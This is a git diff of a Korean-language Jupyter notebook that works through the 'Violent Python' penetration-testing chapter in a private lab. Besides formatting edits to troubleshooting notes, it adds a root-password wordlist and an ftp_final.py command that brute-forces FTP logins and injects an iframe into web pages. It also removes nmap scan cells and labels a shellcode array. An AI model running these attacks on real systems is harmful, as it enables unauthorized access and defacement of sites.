--- a/books/violent_python/ch02_Penetration_test.ipynb
+++ b/books/violent_python/ch02_Penetration_test.ipynb
@@ -1,7 +1,7 @@
 {
  "metadata": {
   "name": "",
-  "signature": "sha256:0555e13ff4dd0a4f9962124b739ee7ec52f1034d6eefd594d4d3cb95c4fa1826"
+  "signature": "sha256:abcb20ca1408b02e312be15a03707817a24a4867aae616337bc80fb332f32b2e"
  },
  "nbformat": 3,
  "nbformat_minor": 0,
@@ -1204,7 +1204,7 @@
       "- SSH \ud074\ub77c\uc774\uc5b8\ud2b8 \ud504\ub85c\uadf8\ub7a8\uc740 \uc0ac\uc6a9\uc790\uac00 \uc9c1\uc811 \uc785\ub825\ud574\uc57c \ud558\ub294 \ubd80\ubd84\ub4e4\uc774 \uc788\uae30 \ub54c\ubb38\uc5d0, \uc2a4\ud06c\ub9bd\ud2b8\ub85c SSH\ub97c \uc791\ub3d9\uc2dc\ud0a4\uae30 \uc704\ud574\uc11c\ub294 \ud074\ub77c\uc774\uc5b8\ud2b8 \ud504\ub85c\uadf8\ub7a8\uc5d0\uc11c **\uae30\ub300\ud558\uace0 \uc788\ub294 \uba85\ub839\uc5b4**\ub098 **\uac12**\uc744 **\uc2a4\ud06c\ub9bd\ud2b8\uc5d0\uc11c \uc785\ub825**\uc2dc\ud0ac \uc218 \uc788\uc5b4\uc57c \ud568\n",
       "- \ubaa8\ub4e0 \uac83\uc774 \uc644\ub8cc\ud558\uba74 \uc6b0\ub9ac\uac00 **\uc6d0\ud558\ub294 \uba85\ub839\uc5b4**\ub97c SSH\ub85c **\uc804\uc1a1**\ud560 \uc218 \uc788\uc74c\n",
       "\n",
-      "#### SSH Install in mac\n",
+      "#### psexpect Install in mac\n",
       "\n",
       "> pip install pexpect\n",
       "\n",
@@ -2302,10 +2302,14 @@
      "cell_type": "markdown",
      "metadata": {},
      "source": [
+      "-----\n",
+      "\n",
       "#### \ucf54\ub4dc indent \uc5c9\ub9dd\n",
       "\n",
       "- \ucc45\uacfc \ub2e4\uc6b4\ub85c\ub4dc \ubc1b\uc740 \uc18c\uc2a4\ucf54\ub4dc \ubaa8\ub450 indent\uac00 \uc5c9\ub9dd\uc774\ub77c\uc11c \ud574\uc11d\ud558\uae30\uac00 \uc5b4\ub824\uc6e0\ub2e4.\n",
-      "- \ud30c\uc774\uc36c\uc5d0\uc11c indent\ub294 C\uc5b8\uc5b4\uc758 {}\uc640 \uac19\uc740 \uc5ed\ud560\uc744 \ud558\ub294 \uac83\uc778\ub370 \uc5c9\ub9dd\uc73c\ub85c \ub9cc\ub4e4\uba74 \uc774\ud574\ud558\uae30\uac00 \uc27d\uc9c0\uc54a\uace0 \ub17c\ub9ac\uc801\uc73c\ub85c \ub530\uc838\ubd10\uc57c \ud55c\ub2e4."
+      "- \ud30c\uc774\uc36c\uc5d0\uc11c indent\ub294 C\uc5b8\uc5b4\uc758 {}\uc640 \uac19\uc740 \uc5ed\ud560\uc744 \ud558\ub294 \uac83\uc778\ub370 \uc5c9\ub9dd\uc73c\ub85c \ub9cc\ub4e4\uba74 \uc774\ud574\ud558\uae30\uac00 \uc27d\uc9c0\uc54a\uace0 \ub17c\ub9ac\uc801\uc73c\ub85c \ub530\uc838\ubd10\uc57c \ud55c\ub2e4.\n",
+      "\n",
+      "-----"
      ]
     },
     {
@@ -2811,7 +2815,7 @@
       "\n",
       "#### ssh known hosts \uc548\uc5d0 key\ub97c \uc800\uc7a5\ud574\ub193\uace0 \ud65c\uc6a9\n",
       "\n",
-      "- \uc811\uc18d\uc774 \uc798 \uc548\ub418\uba74 \uc774 \ubd80\ubd84 \uc0ad\uc81c\ud558\uace0 \uc811\uc18d \uc2dc\ub3c4\n",
+      "- \uc811\uc18d\uc774 \uc798 \uc548\ub418\uba74 \ud574\ub2f9 ip \ubd80\ubd84 \uc0ad\uc81c\ud558\uace0 \uc811\uc18d \uc2dc\ub3c4\n",
       "\n",
       "<img src=\"files/images/ssh_known_hosts.png\" />"
      ]
@@ -2901,13 +2905,17 @@
      "cell_type": "markdown",
      "metadata": {},
      "source": [
+      "-----\n",
+      "\n",
       "#### nameserver Error\n",
       "\n",
       "- default nameserver\n",
       "- nameserver 203.248.252.2\n",
       "- nameserver 164.124.101.2\n",
       "- \uc774\uac83\uc744 nameserver 8.8.8.8 \ub85c \ubc14\uafb8\ub2c8 192.168.10 \ub300\uc5ed\uc744 \uc81c\ub300\ub85c \ucc3e\uc9c0 \ubabb\ud574\uc11c \uc18d\ub3c4\uac00 \ub290\ub824\uc9d0\n",
-      "- dhclient\ub294 DHCP\uac00 \uc790\ub3d9\uc73c\ub85c \ud560\ub2f9\ud558\uac8c \ud558\ub294 \uac83. \uadf8\ub7ec\ub2c8 dns \uc11c\ubc84\ub294 \uac74\ub4dc\ub9ac\uc9c0 \ub9d0\uc790. \uc774\uac83 \ub54c\ubb38\uc5d0 2\uc2dc\uac04 \uc0bd\uc9c8\ud568"
+      "- dhclient\ub294 DHCP\uac00 \uc790\ub3d9\uc73c\ub85c \ud560\ub2f9\ud558\uac8c \ud558\ub294 \uac83. \uadf8\ub7ec\ub2c8 dns \uc11c\ubc84\ub294 \uac74\ub4dc\ub9ac\uc9c0 \ub9d0\uc790. \uc774\uac83 \ub54c\ubb38\uc5d0 2\uc2dc\uac04 \uc0bd\uc9c8\ud568\n",
+      "\n",
+      "-----"
      ]
     },
     {
@@ -3863,6 +3871,28 @@
      "cell_type": "code",
      "collapsed": false,
      "input": [
+      "!cat ch02/userpass.txt"
+     ],
+     "language": "python",
+     "metadata": {},
+     "outputs": [
+      {
+       "output_type": "stream",
+       "stream": "stdout",
+       "text": [
+        "root:nice\r\n",
+        "root:apple\r\n",
+        "root:toor\r\n",
+        "root:oracle"
+       ]
+      }
+     ],
+     "prompt_number": 21
+    },
+    {
+     "cell_type": "code",
+     "collapsed": false,
+     "input": [
       "!python ftp_final.py -H 192.168.32.94 -r \"<iframe src='http://www.naver.com', width=600, height=1000></ifarme>\" -f ch02/userpass.txt"
      ],
      "language": "python",
@@ -4401,91 +4431,6 @@
      "cell_type": "code",
      "collapsed": false,
      "input": [
-      "import nmap"
-     ],
-     "language": "python",
-     "metadata": {},
-     "outputs": [],
-     "prompt_number": 7
-    },
-    {
-     "cell_type": "code",
-     "collapsed": false,
-     "input": [
-      "findTgts('192.168.32.0')"
-     ],
-     "language": "python",
-     "metadata": {},
-     "outputs": [
-      {
-       "metadata": {},
-       "output_type": "pyout",
-       "prompt_number": 9,
-       "text": [
-        "[]"
-       ]
-      }
-     ],
-     "prompt_number": 9
-    },
-    {
-     "cell_type": "code",
-     "collapsed": false,
-     "input": [
-      "nmScan = nmap.PortScanner()"
-     ],
-     "language": "python",
-     "metadata": {},
-     "outputs": [],
-     "prompt_number": 10
-    },
-    {
-     "cell_type": "code",
-     "collapsed": false,
-     "input": [
-      "nmScan.scan(['192.168.32.95', '192.168.32.94'], '445')"
-     ],
-     "language": "python",
-     "metadata": {},
-     "outputs": [
-      {
-       "ename": "AssertionError",
-       "evalue": "Wrong type for [hosts], should be a string [was <type 'list'>]",
-       "output_type": "pyerr",
-       "traceback": [
-        "\u001b[0;31m---------------------------------------------------------------------------\u001b[0m\n\u001b[0;31mAssertionError\u001b[0m                            Traceback (most recent call last)",
-        "\u001b[0;32m<ipython-input-13-8be6e79e5788>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m()\u001b[0m\n\u001b[0;32m----> 1\u001b[0;31m \u001b[0mnmScan\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mscan\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0;34m'192.168.32.95'\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0;34m'192.168.32.94'\u001b[0m\u001b[0;34m]\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0;34m'445'\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m",
-        "\u001b[0;32m/Users/re4lfl0w/Library/Enthought/Canopy_64bit/User/lib/python2.7/site-packages/nmap/nmap.pyc\u001b[0m in \u001b[0;36mscan\u001b[0;34m(self, hosts, ports, arguments)\u001b[0m\n\u001b[1;32m    253\u001b[0m         \"\"\"\n\u001b[1;32m    254\u001b[0m         \u001b[0;32mif\u001b[0m \u001b[0msys\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mversion_info\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0;36m0\u001b[0m\u001b[0;34m]\u001b[0m\u001b[0;34m==\u001b[0m\u001b[0;36m2\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m--> 255\u001b[0;31m             \u001b[0;32massert\u001b[0m \u001b[0mtype\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mhosts\u001b[0m\u001b[0;34m)\u001b[0m \u001b[0;32min\u001b[0m \u001b[0;34m(\u001b[0m\u001b[0mstr\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0municode\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0;34m'Wrong type for [hosts], should be a string [was {0}]'\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mformat\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mtype\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mhosts\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m    256\u001b[0m         \u001b[0;32melse\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m    257\u001b[0m             \u001b[0;32massert\u001b[0m \u001b[0mtype\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mhosts\u001b[0m\u001b[0;34m)\u001b[0m \u001b[0;32mis\u001b[0m \u001b[0mstr\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0;34m'Wrong type for [hosts], should be a string [was {0}]'\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mformat\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mtype\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mhosts\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n",
-        "\u001b[0;31mAssertionError\u001b[0m: Wrong type for [hosts], should be a string [was <type 'list'>]"
-       ]
-      }
-     ],
-     "prompt_number": 13
-    },
-    {
-     "cell_type": "code",
-     "collapsed": false,
-     "input": [
-      "nmScan.all_hosts()"
-     ],
-     "language": "python",
-     "metadata": {},
-     "outputs": [
-      {
-       "metadata": {},
-       "output_type": "pyout",
-       "prompt_number": 12,
-       "text": [
-        "[u'192.168.32.95']"
-       ]
-      }
-     ],
-     "prompt_number": 12
-    },
-    {
-     "cell_type": "code",
-     "collapsed": false,
-     "input": [
       "%%writefile ch02/passwords.txt\n",
       "nice\n",
       "good\n",
@@ -4509,13 +4454,17 @@
      "cell_type": "markdown",
      "metadata": {},
      "source": [
+      "----\n",
+      "\n",
       "#### [Using Metasploit got STATUS_LOGON_FAILURE in Windows XP SP3](https://community.rapid7.com/thread/1932)\n",
       "\n",
       "- \uc774\uac83 \ub54c\ubb38\uc5d0 8\uc2dc\uac04 \uc815\ub3c4 \uc0bd\uc9d1..\n",
-      "- \ubb38\uc81c\ub294 xp\uc5d0\uc11c \ub85c\uceec\ubcf4\uc548 \uc815\ucc45- \ubcf4\uc548 \uc635\uc158 - \ub124\ud2b8\uc6cc\ud06c \uc561\uc138\uc11c: \ub85c\uceec \uacc4\uc815\uc5d0 \ub300\ud55c \uacf5\uc720 \ubc0f \ubcf4\uc548 \ub4f1\ub85d \uc815\ubcf4\uc5d0\uc11c Guest\ub9cc \ud5c8\uc6a9\ub418\uc5b4 \uc788\uae30 \ub54c\ubb38\uc774\ub2e4.(default) \uc65c \uadf8 \uc218 \ub9ce\uc740 \ub3d9\uc601\uc0c1\uc5d0\uc11c\ub294 \uc774\uac78 \uc0dd\ub7b5\ud574 \ub1a8\uc744\uae4c? \n",
+      "- \ubb38\uc81c\ub294 xp\uc5d0\uc11c \ub85c\uceec\ubcf4\uc548 \uc815\ucc45- \ubcf4\uc548 \uc635\uc158 - \ub124\ud2b8\uc6cc\ud06c \uc561\uc138\uc11c: \ub85c\uceec \uacc4\uc815\uc5d0 \ub300\ud55c \uacf5\uc720 \ubc0f \ubcf4\uc548 \ub4f1\ub85d \uc815\ubcf4\uc5d0\uc11c Guest\ub9cc \ud5c8\uc6a9\ub418\uc5b4 \uc788\uae30 \ub54c\ubb38\uc774\ub2e4.(default) **\uc65c \uadf8 \uc218 \ub9ce\uc740 \ub3d9\uc601\uc0c1\uc5d0\uc11c\ub294 \uc774\uac78 \uc0dd\ub7b5\ud574 \ub1a8\uc744\uae4c?** \n",
       "- \ub2e4\ub978 \ub3d9\uc601\uc0c1\uc5d0\uc11c\ub294 \uc798 \ub418\ub294\ub370.. \uc65c \ub0b4\uac83\ub9cc \uc548\ub3fc\uc9c0? \uac81\ub098 \uc0bd\uc9c8\ud588\ub2e4..\n",
       "\n",
-      "<img src=\"files/images/local_security.png\" />"
+      "<img src=\"files/images/local_security.png\" />\n",
+      "\n",
+      "-----"
      ]
     },
     {
@@ -4616,6 +4565,7 @@
       "import time\n",
       "import struct\n",
       "\n",
+      "# msfconsole shakai encoder\n",
       "shellcode = (\"\\xbf\\x5c\\x2a\\x11\\xb3\\xd9\\xe5\\xd9\\x74\\x24\\xf4\\x5d\\x33\\xc9\" \n",
       "\"\\xb1\\x56\\x83\\xc5\\x04\\x31\\x7d\\x0f\\x03\\x7d\\x53\\xc8\\xe4\\x4f\" \n",
       "\"\\x83\\x85\\x07\\xb0\\x53\\xf6\\x8e\\x55\\x62\\x24\\xf4\\x1e\\xd6\\xf8\" \n",
